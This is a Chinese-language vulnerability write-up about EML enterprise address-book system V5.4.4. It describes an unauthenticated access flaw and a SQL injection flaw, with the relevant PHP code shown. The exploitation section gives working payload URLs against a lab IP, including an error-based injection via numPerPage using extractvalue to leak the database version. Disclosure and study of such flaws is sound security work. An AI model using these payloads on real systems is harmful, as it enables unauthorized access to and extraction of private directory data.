EML企业通讯录管理系统经典版V5.4.4_未授權訪問&SQL注入漏洞

# EML企业通讯录管理系统经典版V5.4.4 未授權訪問&SQL注入漏洞
==未授權訪問==

action/action.address.php

header("Content-type: text/html; charset=utf-8");

if(!defined('CORE'))exit("error!"); 

.....

頁面未加用戶是否登錄判斷,打開頁面是普通用戶權限。 (系統是可以註冊的。)

==SQL注入==
lib/func.class.php

function _RunMagicQuotes(&$svar){
	if(!get_magic_quotes_gpc())	{
		if( is_array($svar) ){
			foreach($svar as $_k => $_v) $svar[$_k] = _RunMagicQuotes($_v);
		}else{
			$svar = addslashes($svar);
		}
	}
	return $svar;
}

過濾的函數_RunMagicQuotes,判斷是否開啟了get_magic_quotes_gpc,如果開啟就用gpc過濾,如果沒有開啟用addslashes過濾。 5.4.0 始終返回 FALSE,因為這個魔術引號功能已經從 PHP 中移除了。

==漏洞利用==

===未授權訪問Payload===

http://192.168.116.138/eml/index.php?action=address

===SQL注入Payload===
get方法,判斷注入是否存在:

http://192.168.116.138/eml/index.php?action=address&pageNum=/1

post方法:

http://192.168.116.138/eml/index.php?action=address&pageNum=0

numPerPage=1 procedure analyse(1,extractvalue(rand(),concat(0x7e,version())));
© 版权声明
THE END
喜欢就支持一下吧
点赞0赞赏 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容